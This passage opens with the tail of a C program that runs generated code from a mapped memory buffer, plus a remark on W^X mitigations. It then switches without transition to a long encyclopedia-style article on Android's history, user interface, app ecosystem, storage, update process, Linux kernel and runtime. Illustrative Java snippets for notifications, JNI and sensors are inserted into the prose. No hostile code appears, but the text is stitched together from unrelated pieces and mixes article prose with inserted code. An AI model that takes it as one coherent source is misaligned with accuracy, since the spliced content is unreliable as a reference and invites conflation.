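        int (*fn)(void) = (int (*)(void))buf;
        printf("generated code returned %d\n", fn());

        munmap(buf, page);
        return 0;
    }

Some strictly W^X-enforcing systems additionally refuse such permission transitions unless the binary is explicitly marked as needing them, which is the intended effect of the mitigation.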
Android is an operating system based on a modified version of the Linux kernel and other open-source software, designed primarily for touchscreen-based mobile devices such as smartphones and tablets. Android has historically been developed by a consortium of developers known as the Open Handset Alliance, but its most widely used version is primarily developed by Google. First released in 2008, Android is the world's most widely used operating system; the latest version, released on October 15, 2024, is Android 15.[4] At its core, the operating system is known as the Android Open Source Project (AOSP)[5] and is free and open-source software (FOSS) primarily licensed under the Apache License. However, most devices run the proprietary Android version developed by Google, which ships with additional proprietary closed-source software pre-installed,[6] most notably Google Mobile Services (GMS),[7] which includes core apps such as Google Chrome, the digital distribution platform Google Play, and the associated Google Play Services development platform. Firebase Cloud Messaging is used for push notifications. While AOSP is free, the "Android" name and logo are trademarks of Google, which restricts the use of Android branding on "uncertified" products.[8][9] The majority of smartphones based on AOSP run Google's ecosystem—which is known simply as Android—some with vendor-customized user interfaces and software suites,[10] for example One UI. Numerous modified distributions exist, including the competing Amazon Fire OS and the community-developed LineageOS; the source code has also been used to develop a variety of Android distributions on a range of other electronics, such as Android TV for televisions, Wear OS for wearables, and Meta Horizon OS for VR headsets. Software packages on Android, which use the APK format, are generally distributed through a proprietary application store; non-Google platforms include the vendor-specific Amazon Appstore, Samsung Galaxy Store and Huawei AppGallery, the third-party stores Aptoide, Cafe Bazaar and GetJar, and the open-source F-Droid. Since 2011, Android has been the most used operating system worldwide on smartphones. It has the largest installed base of any operating system in the world,[11] with over three billion monthly active users[a] and accounting for 46% of the global operating system market.[b][12] Android Inc. was founded in Palo Alto, California, in October 2003 by Andy Rubin and Chris White, with Rich Miner and Nick Sears[13][14] joining later. Rubin and White started out to build an operating system for digital cameras, viz. FotoFrame. The company name was changed to Android as Rubin already owned the domain name android.com. After having built a prototype internally known as the "Fadden demo", predominantly by purchasing licensing agreements for most of the software components, built around a custom JavaScript front-end, the company failed to convince investors, and so in April 2004 it pivoted to building an operating system for phones at the suggestion of Nick Sears,[15][16] as a rival to Symbian and Microsoft Windows Mobile.[17] Rubin pitched the Android project as having "tremendous potential in developing smarter mobile devices that are more aware of its owner's location and preferences".[14] Due to difficulty attracting investors early on, Android faced potential eviction from its office space. Steve Perlman, a close friend of Rubin, brought him $10,000 in cash in an envelope, and shortly thereafter wired an undisclosed amount as seed funding. 
Perlman refused a stake in the company, and has stated "I did it because I believed in the thing, and I wanted to help Andy."[18][19] In 2005, Rubin tried to negotiate deals withSamsung[20]andHTC.[21]Shortly afterwards,Googleacquired the company in July of that year for at least $50 million;[14][22]this was Google's "best deal ever" according to Google's then-vice president of corporate development,David Lawee, in 2010.[20]Android's key employees, including Rubin, Miner, Sears, and White, joined Google as part of the acquisition.[14]Not much was known about the secretive Android Inc. at the time, with the company having provided few details other than that it was making software for mobile phones.[14]At Google, the team led by Rubin developed a mobile device platform powered by theLinux kernel. Google marketed the platform tohandset makersandcarrierson the promise of providing a flexible, upgradeable system.[23]Google had "lined up a series of hardware components and software partners and signaled to carriers that it was open to various degrees of cooperation".[attribution needed][24] Speculation about Google's intention to enter the mobile communications market continued to build through December 2006.[25]An earlyprototypehad a close resemblance to aBlackBerryphone, with no touchscreen and a physicalQWERTYkeyboard, but the arrival ofApple's2007iPhonemeant that Android "had to go back to the drawing board".[26][27]Google later changed its Android specification documents to state that "Touchscreens will be supported", although "the Product was designed with the presence of discrete physical buttons as an assumption, therefore a touchscreen cannot completely replace physical buttons".[28]By 2008, bothNokiaand BlackBerry announced touch-based smartphones to rival theiPhone 3G, and Android's focus eventually switched to just touchscreens. The first commercially available smartphone running Android was theHTC Dream, also known as T-Mobile G1, announced on September 23, 2008.[29][30] On November 5, 2007, theOpen Handset Alliance, aconsortiumof technology companies including Google, device manufacturers such as HTC,Motorolaand Samsung, wireless carriers such asSprintandT-Mobile, and chipset makers such asQualcommandTexas Instruments, unveiled itself, with a goal to develop "the first truly open and comprehensive platform for mobile devices".[31][32][33]Within a year, the Open Handset Alliance faced two otheropen sourcecompetitors, theSymbian Foundationand theLiMo Foundation, the latter also developing aLinux-based mobile operating system like Google. In September 2007, Google had filed severalpatentapplications in the area of mobile telephony.[34][35][36] On September 23, 2008, Android was introduced by Andy Rubin, Larry Page, Sergey Brin, Cole Brodman, Christopher Schlaeffer and Peter Chou at a press conference in aNew York Citysubway station.[37] Since 2008, Android has seennumerous updateswhich have incrementally improved the operating system, adding new features and fixingbugsin previous releases. The first two Android versions were internally codenamedAstro BoyandBenderbut licensing issues meant subsequent releases were named after dessert or sugary treat in an alphabetical order, with the first few Android versions being called "Petit Four", "Cupcake", "Donut", "Eclair",[38]and "Froyo", in that order. 
During its announcement of Android KitKat in 2013, Google explained that "Since these devices make our lives so sweet, each Android version is named after a dessert", although a Google spokesperson told CNN in an interview that "It's kind of like an internal team thing, and we prefer to be a little bit—how should I say—a bit inscrutable in the matter, I'll say".[39] In 2010, Google launched its Nexus series of devices, a lineup in which Google partnered with different device manufacturers to produce new devices and introduce new Android versions. The series was described as having "played a pivotal role in Android's history by introducing new software iterations and hardware standards across the board", and became known for its "bloat-free" software with "timely ... updates".[40] At its developer conference in May 2013, Google announced a special version of the Samsung Galaxy S4, where, instead of using Samsung's own Android customization, the phone ran "stock Android" and was promised to receive new system updates quickly.[41] The device would become the start of the Google Play edition program, and was followed by other devices, including the HTC One Google Play edition[42] and the Moto G Google Play edition.[43] In 2015, Ars Technica wrote that "Earlier this week, the last of the Google Play edition Android phones in Google's online storefront were listed as 'no longer available for sale'" and that "Now they're all gone, and it looks a whole lot like the program has wrapped up".[44][45] From 2008 to 2013, Hugo Barra served as product spokesperson, representing Android at press conferences and Google I/O, Google's annual developer-focused conference. He left Google in August 2013 to join the Chinese phone maker Xiaomi.[46][47] Less than six months earlier, Google's then-CEO Larry Page announced in a blog post that Andy Rubin had moved from the Android division to take on new projects at Google, and that Sundar Pichai would become the new Android lead.[48][49] Pichai himself would eventually switch positions, becoming the new CEO of Google in August 2015 following the company's restructuring into the Alphabet conglomerate,[50][51] making Hiroshi Lockheimer the new head of Android.[52][53] On Android 4.4 "KitKat", shared write access to MicroSD memory cards was locked down for user-installed applications, which could only write to their dedicated, package-named directories inside Android/data/. 
Writing access has been reinstated withAndroid 5Lollipopthrough thebackwards-incompatibleGoogle Storage Access Frameworkinterface.[54] In June 2014, Google announcedAndroid One, a set of "hardware reference models" that would "allow [device makers] to easily create high-quality phones at low costs", designed for consumers in developing countries.[55][56][57]In September, Google announced the first set of Android One phones for release in India.[58][59]However,Recodereported in June 2015 that the project was "a disappointment", citing "reluctant consumers and manufacturing partners" and "misfires from the search company that has never quite cracked hardware".[60]Plans to relaunch Android One surfaced in August 2015,[61]with Africa announced as the next location for the program a week later.[62][63]A report fromThe Informationin January 2017 stated that Google is expanding its low-cost Android One program into the United States, althoughThe Vergenotes that the company will presumably not produce the actual devices itself.[64][65]Google introduced thePixel and Pixel XL smartphonesin October 2016, marketed as being the first phones made by Google,[66][67]and exclusively featured certain software features, such as theGoogle Assistant, before wider rollout.[68][69]The Pixel phones replaced the Nexus series,[70]with a new generation of Pixel phones launched in October 2017.[71] In May 2019, the operating system became entangled in thetrade war between China and the United StatesinvolvingHuawei, which, like many other tech firms, had become dependent on access to the Android platform.[72][73]In the summer of 2019, Huawei announced it would create an alternative operating system to Android[74]known asHarmony OS,[75]and has filed for intellectual property rights across major global markets.[76][77]Under such sanctions Huawei has long-term plans to replace Android in 2022 with the new operating system, as Harmony OS was originally designed forinternet of thingsdevices, rather than for smartphones and tablets.[78] On August 22, 2019, it was announced that Android "Q" would officially be branded as Android 10, ending the historic practice of naming major versions after desserts. Google stated that these names were not "inclusive" to international users (due either to the aforementioned foods not being internationally known, or being difficult to pronounce in some languages).[79][80]On the same day,Android Policereported that Google had commissioned a statue of a giant number "10" to be installed in the lobby of the developers' new office.[81]Android 10 was released on September 3, 2019, toGoogle Pixelphones first. In late 2021, some users reported that they were unable to dial emergency services.[82][83]The problem was caused by a combination of bugs in Android and in theMicrosoft Teamsapp; both companies released updates addressing the issue.[84] On December 12, 2024GoogleannouncedAndroid XR. It is a new operating system developed by Google, designed forvirtual realityandaugmented realitydevices, such as VR headsets and smart glasses. It was built in collaboration withSamsungandQualcomm. 
The platform is also focused on supporting developers with tools like ARCore and Unity to build applications for upcoming XR devices.[85] Android's default user interface is mainly based on direct manipulation, using touch inputs that loosely correspond to real-world actions, like swiping, tapping, pinching, and reverse pinching to manipulate on-screen objects, along with a virtual keyboard.[86] Game controllers and full-size physical keyboards are supported via Bluetooth or USB.[87][88] The response to user input is designed to be immediate and provides a fluid touch interface, often using the vibration capabilities of the device to provide haptic feedback to the user. Internal hardware, such as accelerometers, gyroscopes and proximity sensors, is used by some applications to respond to additional user actions, for example adjusting the screen from portrait to landscape depending on how the device is oriented,[89] or allowing the user to steer a vehicle in a racing game by rotating the device, simulating control of a steering wheel.[90] Android devices boot to the home screen, the primary navigation and information "hub" on Android devices, analogous to the desktop found on personal computers. Android home screens are typically made up of app icons and widgets; app icons launch the associated app, whereas widgets display live, auto-updating content, such as a weather forecast, the user's email inbox, or a news ticker, directly on the home screen.[91] A home screen may be made up of several pages, between which the user can swipe back and forth.[92] Third-party apps available on Google Play and other app stores can extensively re-theme the home screen,[93] and even mimic the look of other operating systems, such as Windows Phone.[94] Most manufacturers customize the look and features of their Android devices to differentiate themselves from their competitors.[95] Along the top of the screen is a status bar, showing information about the device and its connectivity. This status bar can be pulled (swiped) down to reveal a notification screen where apps display important information or updates, as well as quick access to system controls and toggles such as display brightness, connectivity settings (WiFi, Bluetooth, cellular data), audio mode, and flashlight.[92] Vendors may implement extended settings, such as the ability to adjust the flashlight brightness.[96] Notifications are "short, timely, and relevant information about your app when it's not in use", and when tapped, users are directed to a screen inside the app relating to the notification.[97] Beginning with Android 4.1 "Jelly Bean", "expandable notifications" allow the user to tap an icon on the notification in order for it to expand and display more information and possible app actions right from the notification.[98] An "All Apps" screen lists all installed applications, with the ability for users to drag an app from the list onto the home screen. The app list may be accessed using a gesture or a button, depending on the Android version. A "Recents" screen, also known as "Overview", lets users switch between recently used apps.[92] The recents list may appear side-by-side or overlapping, depending on the Android version and manufacturer.[99] Many early Android smartphones were equipped with a dedicated search button for quick access to a web search engine and individual apps' internal search features. 
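As a hedged illustration of the notification system described above, the following Java sketch posts an expandable "big text" notification; the channel id, message texts and icon are invented for the example, and on Android 13 or later the app would additionally need the POST_NOTIFICATIONS runtime permission.

    import android.app.Notification;
    import android.app.NotificationChannel;
    import android.app.NotificationManager;
    import android.content.Context;

    // Sketch only: posts an expandable notification on Android 8.0+ (channels required).
    public class NotificationExample {
        public static void showInboxUpdate(Context context) {
            NotificationManager manager =
                    (NotificationManager) context.getSystemService(Context.NOTIFICATION_SERVICE);

            // Since Android 8.0 "Oreo", every notification must belong to a channel.
            NotificationChannel channel = new NotificationChannel(
                    "updates", "Updates", NotificationManager.IMPORTANCE_DEFAULT);
            manager.createNotificationChannel(channel);

            Notification notification = new Notification.Builder(context, "updates")
                    .setSmallIcon(android.R.drawable.stat_notify_chat)   // placeholder system icon
                    .setContentTitle("3 new messages")                   // collapsed view
                    .setContentText("Tap to open the inbox")
                    .setStyle(new Notification.BigTextStyle()            // expanded ("big") view
                            .bigText("Alice: lunch?\nBob: build is green\nCarol: see attachment"))
                    .build();

            manager.notify(1, notification);                             // id 1 is arbitrary
        }
    }

Tapping the posted notification would normally also carry a content intent that directs the user to the relevant screen inside the app, as the text above describes.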
More recent devices typically allow quick access to a web search engine through a long press or a swipe away from the home button.[100] The dedicated option key, also known as the menu key, and its on-screen simulation are no longer supported since Android version 10. Google recommends that mobile application developers locate menus within the user interface.[100] On more recent phones, its place is occupied by a task key used to access the list of recently used apps when actuated. Depending on the device, a long press of this key may simulate a menu button press or engage split-screen view; the latter has been the default behaviour since stock Android version 7.[101][102][103] Native support for split-screen view was added in stock Android version 7.0 Nougat.[103] The earliest vendor-customized Android-based smartphones known to have featured a split-screen view mode are the 2012 Samsung Galaxy S3 and Note 2, the former of which received this feature with the premium suite upgrade delivered in TouchWiz with Android 4.1 Jelly Bean.[104] When charging power is connected or disconnected, or when the power or home button is briefly pressed while the device is powered off, a battery meter whose appearance varies among vendors appears on the screen, allowing the user to quickly check the charge status of a powered-off device without having to boot it up first. Some devices also display the battery percentage.[105] Most Android devices come with preinstalled Google apps including Gmail, Google Maps, Google Chrome, YouTube, Google Play Movies & TV, and others. Applications ("apps"), which extend the functionality of devices (and must be 64-bit[106]), are written using the Android software development kit (SDK)[107] and, often, the Kotlin programming language, which replaced Java as Google's preferred language for Android app development in May 2019,[108] having originally been announced in May 2017.[109][110] Java is still supported (it was originally the only option for user-space programs, and is often mixed with Kotlin), as is C++.[111] Java or other JVM languages, such as Kotlin, may be combined with C/C++,[112] together with a choice of non-default runtimes that allow better C++ support.[113] The SDK includes a comprehensive set of development tools,[114] including a debugger, software libraries, a handset emulator based on QEMU, documentation, sample code, and tutorials. Initially, Google's supported integrated development environment (IDE) was Eclipse using the Android Development Tools (ADT) plugin; in December 2014, Google released Android Studio, based on IntelliJ IDEA, as its primary IDE for Android application development. Other development tools are available, including a native development kit (NDK) for applications or extensions in C or C++, Google App Inventor, a visual environment for novice programmers, and various cross-platform mobile web application frameworks. 
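To make the NDK workflow concrete, here is a minimal, hedged Java-side sketch of how an app can call into native code through the JNI; the package, class, method and library names are all hypothetical, and the corresponding C implementation would be compiled separately with the NDK.

    package com.example.ndkdemo; // hypothetical package

    // Sketch of the Java side of a JNI binding; the native library is built with the NDK.
    public class NativeClock {
        static {
            // Loads libnativeclock.so from the APK's native library directory.
            System.loadLibrary("nativeclock");
        }

        // Declared here, implemented in C roughly as:
        //   JNIEXPORT jlong JNICALL
        //   Java_com_example_ndkdemo_NativeClock_uptimeMillis(JNIEnv* env, jobject thiz) { ... }
        public native long uptimeMillis();
    }

A caller simply instantiates the class and invokes uptimeMillis() like any other Java method; the naming convention shown in the comment is how the runtime locates the C implementation.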
In January 2014, Google unveiled a framework based onApache Cordovafor portingChromeHTML 5web applicationsto Android, wrapped in a native application shell.[115]Additionally,Firebasewas acquired by Google in 2014 that provides helpful tools for app and web developers.[116] Android has a growing selection of third-party applications, which can be acquired by users by downloading and installing the application'sAPK(Android application package) file, or by downloading them using anapplication storeprogram that allows users toinstall, update, and remove applicationsfrom their devices.Google Play Storeis the primary application store installed on Android devices that comply with Google's compatibility requirements and license the Google Mobile Services software.[117][118]Google Play Store allows users to browse, download and update applications published by Google and third-party developers; as of January 2021[update], there are more than three million applications available for Android in Play Store.[119][120]As of July 2013[update], 50 billion application installations had been performed.[121][122]Some carriers offer direct carrier billing for Google Play application purchases, where the cost of the application is added to the user's monthly bill.[123]As of May 2017[update], there are over one billion active users a month for Gmail, Android, Chrome, Google Play and Maps. Due to the open nature of Android, a number of third-party application marketplaces also exist for Android, either to provide a substitute for devices that are not allowed to ship with Google Play Store, provide applications that cannot be offered on Google Play Store due to policy violations, or for other reasons. Examples of these third-party stores have included theAmazon Appstore,GetJar, and SlideMe.F-Droid, another alternative marketplace, seeks to only provide applications that are distributed underfree and open sourcelicenses.[117][124][125][126] In October 2020, Google removed several Android applications fromPlay Store, as they were identified breaching its data collection rules. The firm was informed by International Digital Accountability Council (IDAC) that apps for children likeNumber Coloring,Princess SalonandCats & Cosplay, with collective downloads of 20 million, were violating Google's policies.[127] At theWindows 11announcement event in June 2021,Microsoftshowcased the newWindows Subsystem for Android(WSA) to enable support for theAndroid Open Source Project(AOSP), but it has since been deprecated. It was meant to allow users runningAndroid appsand games in Windows 11 on their Windows desktop.[128]On March 5, 2024, Microsoft announced deprecation of WSA with support ending on March 5, 2025.[129] The storage of Android devices can be expanded using secondary devices such asSD cards. Android recognizes two types of secondary storage:portablestorage (which is used by default), andadoptablestorage. Portable storage is treated as an external storage device. Adoptable storage, introduced on Android 6.0, allows the internal storage of the device to bespannedwith the SD card, treating it as an extension of the internal storage. 
This has the disadvantage of preventing the memory card from being used with another device unless it is reformatted.[130] Android 4.4 introduced the Storage Access Framework (SAF), a set of APIs for accessing files on the device's filesystem.[131] As of Android 11, Android has required apps to conform to a data privacy policy known as scoped storage, under which apps may only automatically have access to certain directories (such as those for pictures, music, and video), and app-specific directories they have created themselves. Apps are required to use the SAF to access any other part of the filesystem.[132][133][134] Since Android devices are usually battery-powered, Android is designed to manage processes to keep power consumption at a minimum. When an application is not in use, the system suspends its operation so that, while available for immediate use rather than closed, it does not use battery power or CPU resources.[135][136] Android manages the applications stored in memory automatically: when memory is low, the system will begin invisibly and automatically closing inactive processes, starting with those that have been inactive for the longest amount of time.[137][138] Lifehacker reported in 2011 that third-party task-killer applications were doing more harm than good.[139] Some settings for use by developers for debugging and by power users are located in a "Developer options" sub-menu, such as the ability to highlight updating parts of the display, show an overlay with the current status of the touch screen, show touching spots for possible use in screencasting, notify the user of unresponsive background processes with the option to end them ("Show all ANRs", i.e. "App's Not Responding"), prevent a Bluetooth audio client from controlling the system volume ("Disable absolute volume"), and adjust the duration of transition animations or deactivate them completely to speed up navigation.[140][141][142] Developer options have been hidden by default since Android 4.2 "Jelly Bean", but can be enabled by tapping the operating system's build number in the device information seven times. Hiding developer options again requires deleting user data for the "Settings" app, possibly resetting some other preferences, or, in recent Android versions, turning off the Developer options master switch.[143][144][145] The main hardware platform for Android is ARM (i.e. the 64-bit ARMv8-A architecture and previously 32-bit architectures such as ARMv7); the x86 and x86-64 architectures were once also officially supported in later versions of Android.[146][147][148] The unofficial Android-x86 project provided support for x86 architectures ahead of the official support.[149][150] Since 2012, Android devices with Intel processors have appeared, including phones[151] and tablets. While gaining support for 64-bit platforms, Android was first made to run on 64-bit x86 and then on ARM64. An unofficial experimental port of the operating system to the RISC-V architecture was released in 2021.[152] Minimum RAM requirements for devices running Android 7.1 range, in practice, from 2 GB for the best hardware down to 1 GB for devices with the most common screens. Android supports all versions of OpenGL ES and Vulkan (with Vulkan version 1.1 available for some devices[153]). Android devices incorporate many optional hardware components, including still or video cameras, GPS, orientation sensors, dedicated gaming controls, accelerometers, gyroscopes, barometers, magnetometers, proximity sensors, pressure sensors, thermometers, and touchscreens. 
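As a hedged sketch of how an application might use one of the sensors listed above, the following Java activity registers for accelerometer updates, for example to implement the steering-wheel style control mentioned earlier; the class name is hypothetical.

    import android.app.Activity;
    import android.hardware.Sensor;
    import android.hardware.SensorEvent;
    import android.hardware.SensorEventListener;
    import android.hardware.SensorManager;
    import android.os.Bundle;

    // Sketch only: reads accelerometer values while the activity is in the foreground.
    public class TiltActivity extends Activity implements SensorEventListener {
        private SensorManager sensorManager;
        private Sensor accelerometer;

        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            sensorManager = (SensorManager) getSystemService(SENSOR_SERVICE);
            // May be null on hardware without an accelerometer, since the sensor is optional.
            accelerometer = sensorManager.getDefaultSensor(Sensor.TYPE_ACCELEROMETER);
        }

        @Override
        protected void onResume() {
            super.onResume();
            if (accelerometer != null) {
                sensorManager.registerListener(this, accelerometer, SensorManager.SENSOR_DELAY_GAME);
            }
        }

        @Override
        protected void onPause() {
            super.onPause();
            sensorManager.unregisterListener(this); // stop listening to save battery
        }

        @Override
        public void onSensorChanged(SensorEvent event) {
            float tilt = event.values[0]; // lateral tilt, usable e.g. as steering input
            // ... update game or UI state from the tilt value ...
        }

        @Override
        public void onAccuracyChanged(Sensor sensor, int accuracy) {
            // Not needed for this sketch.
        }
    }

Unregistering in onPause, as shown, is the usual pattern for keeping power consumption down while the app is not visible.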
Some hardware components are not required, but became standard in certain classes of devices, such as smartphones, and additional requirements apply if they are present. Some other hardware was initially required, but those requirements have been relaxed or eliminated altogether. For example, as Android was developed initially as a phone OS, hardware such as microphones were required, while over time the phone function became optional.[122]Android used to require anautofocuscamera, which was relaxed to afixed-focuscamera[122]if present at all, since the camera was dropped as a requirement entirely when Android started to be used onset-top boxes. In addition to running on smartphones and tablets, several vendors run Android natively on regular PC hardware with a keyboard and mouse.[154][155][156][157]In addition to their availability on commercially available hardware, similar PC hardware-friendly versions of Android are freely available from the Android-x86 project, including customized Android 4.4.[158]Using the Android emulator that is part of theAndroid SDK, or third-party emulators, Android can also run non-natively on x86 architectures.[159][160]Chinese companies are building a PC and mobile operating system, based on Android, to "compete directly with Microsoft Windows and Google Android".[161]The Chinese Academy of Engineering noted that "more than a dozen" companies were customizing Android following a Chinese ban on the use of Windows 8 on government PCs.[162][163][164] Android is developed by Google until the latest changes and updates are ready to be released, at which point thesource codeis made available to the Android Open Source Project (AOSP),[165]an open source initiative led by Google.[166]The first source code release happened as part of the initial release in 2007. All releases are under theApache License.[167] The AOSP code can be found with minimal modifications on select devices, mainly the former Nexus and current Android One series of devices.[168]However, most original equipment manufacturers (OEMs) customize the source code to run on their hardware.[169][170] Android's source code does not contain thedevice drivers, often proprietary, that are needed for certain hardware components,[171]and does not contain the source code ofGoogle Play Services, which many apps depend on. As a result, most Android devices, including Google's own, ship with a combination offree and open sourceandproprietarysoftware, with the software required for accessing Google services falling into the latter category.[citation needed]In response to this, there are some projects that build complete operating systems based on AOSP as free software, the first beingCyanogenMod(see sectionOpen-source communitybelow). Google provides annual[172]Android releases, both for factory installation in new devices, and forover-the-airupdates to existing devices.[173]The latest major release isAndroid 15. The extensive variation ofhardware[174]in Android devices has caused significant delays for software upgrades andsecurity patches. 
Each upgrade has had to be specifically tailored, a time- and resource-consuming process.[175]Except for devices within the Google Nexus and Pixel brands, updates have often arrived months after the release of the new version, or not at all.[176]Manufacturers often prioritize their newest devices and leave old ones behind.[177]Additional delays can be introduced by wireless carriers who, after receiving updates from manufacturers, further customize Android to their needs and conduct extensive testing on their networks before sending out the upgrade.[177][178]There are also situations in which upgrades are impossible due to a manufacturer not updating necessarydrivers.[179] The lack of after-sale support from manufacturers and carriers has been widely criticized by consumer groups and the technology media.[180][181][182]Some commentators have noted that the industry has a financial incentive not to upgrade their devices, as the lack of updates for existing devices fuels the purchase of newer ones,[183]an attitude described as "insulting".[182]The Guardiancomplained that the method of distribution for updates is complicated only because manufacturers and carriers have designed it that way.[182]In 2011, Google partnered with a number of industry players to announce an "Android Update Alliance", pledging to deliver timely updates for every device for 18 months after its release; however, there has not been another official word about that alliance since its announcement.[177][184] In 2012, Google began de-coupling certain aspects of the operating system (particularly its central applications) so they could be updated through theGoogle Playstore independently of the OS. One of those components,Google Play Services, is aclosed-sourcesystem-level process providingAPIsfor Google services, installed automatically on nearly all devices runningAndroid 2.2 "Froyo"and higher. With these changes, Google can add new system functions and update apps without having to distribute an upgrade to the operating system itself.[185]As a result,Android 4.2 and 4.3 "Jelly Bean"contained relatively fewer user-facing changes, focusing more on minor changes and platform improvements.[186] HTC's then-executive Jason Mackenzie called monthly security updates "unrealistic" in 2015, and Google was trying to persuade carriers to exclude security patches from the full testing procedures. In May 2016,Bloomberg Businessweekreported that Google was making efforts to keep Android more up-to-date, including accelerated rates of security updates, rolling out technological workarounds, reducing requirements for phone testing, and ranking phone makers in an attempt to "shame" them into better behavior. As stated byBloomberg: "As smartphones get more capable, complex and hackable, having the latest software work closely with the hardware is increasingly important". Hiroshi Lockheimer, the Android lead, admitted that "It's not an ideal situation", further commenting that the lack of updates is "the weakest link on security on Android". Wireless carriers were described in the report as the "most challenging discussions", due to their slow approval time while testing on their networks, despite some carriers, includingVerizon WirelessandSprint Corporation, already shortening their approval times. 
In a further effort for persuasion, Google shared a list of top phone makers measured by updated devices with its Android partners, and is considering making the list public.[when?]Mike Chan, co-founder of phone maker Nextbit and former Android developer, said that "The best way to solve this problem is a massive re-architecture of the operating system", "or Google could invest in training manufacturers and carriers 'to be good Android citizens'".[187][188][189] In May 2017, with the announcement ofAndroid 8.0, Google introduced Project Treble, a major re-architect of the Android OS framework designed to make it easier, faster, and less costly for manufacturers to update devices to newer versions of Android. Project Treble separates the vendor implementation (device-specific, lower-level software written by silicon manufacturers) from the Android OS framework via a new "vendor interface". In Android 7.0 and earlier, no formal vendor interface exists, so device makers must update large portions of the Android code to move a device to a newer version of the operating system. With Treble, the new stable vendor interface provides access to the hardware-specific parts of Android, enabling device makers to deliver new Android releases simply by updating the Android OS framework, "without any additional work required from the silicon manufacturers."[190] In September 2017, Google's Project Treble team revealed that, as part of their efforts to improve the security lifecycle of Android devices, Google had managed to get the Linux Foundation to agree to extend the support lifecycle of the Linux Long-Term Support (LTS) kernel branch from the 2 years that it has historically lasted to 6 years for future versions of the LTS kernel, starting with Linux kernel 4.4.[191] In May 2019, with the announcement ofAndroid 10, Google introduced Project Mainline to simplify and expedite delivery of updates to the Android ecosystem. Project Mainline enables updates to core OS components through the Google Play Store. As a result, important security and performance improvements that previously needed to be part of full OS updates can be downloaded and installed as easily as an app update.[192] Google reported rolling out new amendments in Android 12 aimed at making the use of third-party application stores easier. This announcement rectified the concerns reported regarding the development of Android apps, including a fight over an alternative in-app payment system and difficulties faced by businesses moving online because ofCOVID-19.[193] Android'skernelis based on theLinux kernel'slong-term support(LTS) branches. As of 2024[update], Android (14) uses versions 6.1 or 5.15 (for "Feature kernels", can be older for "Launch kernels", e.g. android12-5.10, android11-5.4, depending on Android version down to e.g. 
android-4.14-stable or android-4.9-q); older Android versions use version 5.15 or a number of older kernels.[194] The actual kernel depends on the individual device.[195] Android's variant of the Linux kernel has further architectural changes that are implemented by Google outside the typical Linux kernel development cycle, such as the inclusion of components like device trees, ashmem, ION, and different out of memory (OOM) handling.[196][197] Certain features that Google contributed back to the Linux kernel, notably a power management feature called "wakelocks",[198] were initially rejected by mainline kernel developers, partly because they felt that Google did not show any intent to maintain its own code.[199][200] Google announced in April 2010 that it would hire two employees to work with the Linux kernel community,[201] but Greg Kroah-Hartman, the current Linux kernel maintainer for the stable branch, said in December 2010 that he was concerned that Google was no longer trying to get its code changes included in mainstream Linux.[200] Google engineer Patrick Brady once stated at the company's developer conference that "Android is not Linux",[202] with Computerworld adding that "Let me make it simple for you, without Linux, there is no Android".[203] Ars Technica wrote that "Although Android is built on top of the Linux kernel, the platform has very little in common with the conventional desktop Linux stack".[202] In August 2011, Linus Torvalds said that "eventually Android and Linux would come back to a common kernel, but it will probably not be for four to five years".[204] (This has not happened yet; while some code has been upstreamed, not all of it has, so modified kernels continue to be used.) In December 2011, Greg Kroah-Hartman announced the start of the Android Mainlining Project, which aims to put some Android drivers, patches and features back into the Linux kernel, starting in Linux 3.3.[205] Linux included the autosleep and wakelocks capabilities in the 3.5 kernel, after many previous attempts at a merger. The interfaces are the same but the upstream Linux implementation allows for two different suspend modes: to memory (the traditional suspend that Android uses), and to disk (hibernate, as it is known on the desktop).[206] Google maintains a public code repository that contains their experimental work to re-base Android off the latest stable Linux versions.[207][208] Android is a Linux distribution according to the Linux Foundation,[209] Google's open-source chief Chris DiBona,[210] and several journalists.[211][212] Others, such as Google engineer Patrick Brady, say that Android is not Linux in the traditional Unix-like Linux distribution sense; Android does not include the GNU C Library (it uses Bionic as an alternative C library) and some other components typically found in Linux distributions.[213] With the release of Android Oreo in 2017, Google began to require that devices shipped with new SoCs have Linux kernel version 4.4 or newer, for security reasons. Existing devices upgraded to Oreo, and new products launched with older SoCs, were exempt from this rule.[214][215] The flash storage on Android devices is split into several partitions, such as /system/ for the operating system itself and /data/ for user data and application installations.[216] In contrast to typical desktop Linux distributions, Android device owners are not given root access to the operating system, and sensitive partitions such as /system/ are partially read-only. 
However, root access can be obtained by exploiting security flaws in Android, an approach used frequently by the open-source community to enhance the capabilities and customizability of their devices, but also by malicious parties to install viruses and malware.[217] Root access can also be obtained by unlocking the bootloader, which is possible on most Android devices; on most Google Pixel, OnePlus and Nothing models, for example, the OEM Unlocking option in the developer settings allows the user to unlock the bootloader with Fastboot, after which custom software may be installed. Some OEMs have their own methods. The unlocking process resets the system to factory state, erasing all user data.[218] Proprietary frameworks like Samsung Knox limit or block attempts at rooting. Google's Play Integrity API allows developers to check for any signs of tampering,[219] although the fairness of the tests has been criticized.[220] On top of the Linux kernel, there are the middleware, libraries and APIs written in C, and application software running on an application framework which includes Java-compatible libraries. Development of the Linux kernel continues independently of Android's other source code projects. Android uses Android Runtime (ART) as its runtime environment (introduced in version 4.4), which uses ahead-of-time (AOT) compilation to entirely compile the application bytecode into machine code upon the installation of an application. In Android 4.4, ART was an experimental feature and not enabled by default; it became the only runtime option in the next major version of Android, 5.0.[221] In versions that are no longer supported (up to version 5.0, when ART took over), Android used Dalvik as a process virtual machine with trace-based just-in-time (JIT) compilation to run Dalvik "dex-code" (Dalvik Executable), which is usually translated from the Java bytecode. Following the trace-based JIT principle, in addition to interpreting the majority of application code, Dalvik performs the compilation and native execution of select frequently executed code segments ("traces") each time an application is launched.[222][223][224] For its Java library, the Android platform uses a subset of the now discontinued Apache Harmony project.[225] In December 2015, Google announced that the next version of Android would switch to a Java implementation based on the OpenJDK project.[226] Android's standard C library, Bionic, was developed by Google specifically for Android, as a derivation of BSD's standard C library code. Bionic itself has been designed with several major features specific to the Linux kernel. The main benefits of using Bionic instead of the GNU C Library (glibc) or uClibc are its smaller runtime footprint and its optimization for low-frequency CPUs. At the same time, Bionic is licensed under the terms of the BSD licence, which Google finds more suitable for Android's overall licensing model.[224] Aiming for a different licensing model, toward the end of 2012, Google switched the Bluetooth stack in Android from the GPL-licensed BlueZ to the Apache-licensed BlueDroid.[227] A new Bluetooth stack, called Gabeldorsche, was developed to try to fix the bugs in the BlueDroid implementation.[228] Android does not have a native X Window System by default, nor does it support the full set of standard GNU libraries. 
